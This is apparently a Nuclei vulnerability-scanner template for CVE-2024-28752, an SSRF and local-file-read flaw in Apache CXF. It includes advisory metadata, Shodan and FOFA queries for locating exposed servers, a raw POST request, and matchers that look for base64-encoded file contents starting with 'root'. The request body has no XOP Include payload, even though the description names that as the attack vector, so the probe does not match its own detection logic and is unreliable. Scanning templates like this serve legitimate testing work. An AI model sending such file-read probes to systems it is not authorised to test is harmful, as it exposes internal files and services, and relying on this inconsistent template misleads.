id: CVE-2024-28752

info:
  name: Apache CXF < 4.0.4 - Aegis DataBinding SSRF / Local File Read
  author: maciejklimek
  severity: high
  description: |
    Apache CXF before 4.0.4, 3.6.3 and 3.5.8 has a Server-Side Request Forgery (SSRF) vulnerability when using the Aegis DataBinding. The XOP Include mechanism in multipart SOAP requests can be abused to read local files or make server-side HTTP requests to arbitrary URLs. An attacker can use this to access sensitive internal resources.
  impact: |
    An attacker can read arbitrary files from the server and make server-side requests to internal services.
  remediation: Upgrade Apache CXF to version 4.0.4, 3.6.3, or 3.5.8 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28752
    - https://github.com/advisories/GHSA-qmgx-j96g-4428
    - https://github.com/ReaJason/CVE-2024-28752
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-28752
    epss-score: 0.50829
    epss-percentile: 0.97906
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Apache CXF"
    fofa-query: body="Apache CXF"
  tags: cve,cve2024,apache,cxf,ssrf,lfi

http:
  - raw:
      - |
        POST /test HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/related; boundary=----nucleibound

        ------nucleibound
        Content-Disposition: form-data; name="1"

        ------nucleibound--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Unmarshalling Error"

      - type: regex
        part: body
        regex:
          - "cm9vd[A-Za-z0-9+/=]+"

      - type: word
        part: content_type
        words:
          - "text/xml"
# digest: 4b0a00483046022100ec392f540b133ba79c742edf9dae3cf8c885e03af982707321997b93280082d5022100dd8d99daacbec0c2e5dd7be8106654c0b85e9e9610d9e4bceb201ebf6890c981:922c64590222798bb761d5b6d8e72950